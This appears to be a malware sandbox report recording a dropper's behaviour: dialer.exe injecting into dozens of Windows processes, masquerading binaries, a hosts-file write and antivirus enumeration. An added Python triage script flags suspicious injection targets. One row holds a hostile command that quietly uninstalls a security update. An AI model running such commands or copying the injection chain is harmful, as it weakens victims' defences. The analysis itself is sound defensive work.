                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 13C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 150E9040000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 267FCE60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\PING.EXE base: 2359B4F0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1360000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: C350000 value: 4D
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeThread register set: target process: 7964
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile written: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E29CE0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: C350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BFFC960000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FBA3250000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1D4C2220000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1F2989C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BCF4530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1B0BB950000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\WmiPrvSE.exe base: 13C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\cmd.exe base: 150E9040000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 267FCE60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\PING.EXE base: 2359B4F0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\RuntimeBroker.exe base: 1360000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000
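Every row above has the same source: dialer.exe, a legitimate Windows binary that GargantuanS.exe launches (see the process-creation rows further down) and that evidently hosts the injecting code, writing into svchost.exe, explorer.exe, sihost.exe, ctfmon.exe, WmiPrvSE.exe and the rest, and also into the sample's own dropped binaries, two of which carry system image names outside C:\Windows (C:\Recovery\RuntimeBroker.exe, C:\Recovery\WmiPrvSE.exe). The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses rows in the format above (either fused as extracted or with a separator), counts distinct injection targets per source process, and flags targets whose image name matches a Windows system binary but whose path is not under C:\Windows, or whose path lies outside the program directories altogether. The system image name list and the trusted roots are assumptions chosen for this illustration; a subset of the rows above is embedded as sample input.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumed for this illustration: image names that normally live under C:\Windows.
# One of these names found anywhere else is treated as masquerading.
SYSTEM_IMAGE_NAMES = {
    "svchost.exe", "runtimebroker.exe", "wmiprvse.exe", "explorer.exe",
    "dllhost.exe", "conhost.exe", "spoolsv.exe", "sihost.exe", "ctfmon.exe",
    "winlogon.exe", "smartscreen.exe", "dashost.exe", "audiodg.exe", "cmd.exe",
}
# Assumed trusted installation roots (lower-case, trailing backslash).
WINDOWS_ROOT = "c:\\windows\\"
TRUSTED_ROOTS = (WINDOWS_ROOT, "c:\\program files\\", "c:\\program files (x86)\\")

# Accepts both the fused form ("dialer.exeMemory written:") and a separated one.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)\s*\|?\s*Memory written:\s*"
    r"(?P<dst>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)",
    re.IGNORECASE,
)

# Sample input: a subset of the rows from the report above (one left fused).
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: C350000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
""".strip().splitlines()


def parse_rows(lines):
    """Yield (source_image, target_image, base_address) for each parsable row."""
    for line in lines:
        m = ROW_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["base"], 16)


def classify_target(path):
    """Return 'masquerade', 'nonstandard' or 'trusted' for a written-to image path."""
    low = path.lower()
    name = PureWindowsPath(low).name
    if name in SYSTEM_IMAGE_NAMES and not low.startswith(WINDOWS_ROOT):
        return "masquerade"      # system binary name outside C:\Windows
    if not low.startswith(TRUSTED_ROOTS):
        return "nonstandard"     # e.g. C:\PerfDll\..., C:\Recovery\...
    return "trusted"


def triage(lines):
    """Aggregate memory writes per source process; return {source: summary}."""
    report = defaultdict(lambda: {
        "writes": 0, "targets": set(), "masquerade": set(), "nonstandard": set()})
    for src, dst, _base in parse_rows(lines):
        entry = report[src]
        entry["writes"] += 1
        entry["targets"].add(dst)
        verdict = classify_target(dst)
        if verdict != "trusted":
            entry[verdict].add(dst)
    return dict(report)


if __name__ == "__main__":
    for src, e in triage(SAMPLE_ROWS).items():
        print(f"{src}: {e['writes']} writes into {len(e['targets'])} distinct images")
        for kind in ("masquerade", "nonstandard"):
            for path in sorted(e[kind]):
                print(f"  [{kind}] {path}")
```

The location check is a first pass only: a dropped binary placed under Program Files, as KZcLqgnLvRf.exe is in the rows above, passes it, so pair the path verdict with signature and hash checks on each target image. The number of distinct targets is the stronger signal here; a phone-dialer applet writing into dozens of processes has no benign explanation.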
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\dialer.exe | Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D98DB0 cpuid 0_2_00007FF7F4D98DB0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7F4D7DE04
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: GetLocaleInfoW,GetNumberFormatW,1_2_00D6AF0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\PerfDll\hyperProviderSavesinto.exe | Queries volume information: C:\PerfDll\hyperProviderSavesinto.exe VolumeInformation
Source: C:\PerfDll\hyperProviderSavesinto.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dialer.exe | Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D83FCC GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D83FCC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D66768 GetVersionExW,0_2_00007FF7F4D66768
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B942000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
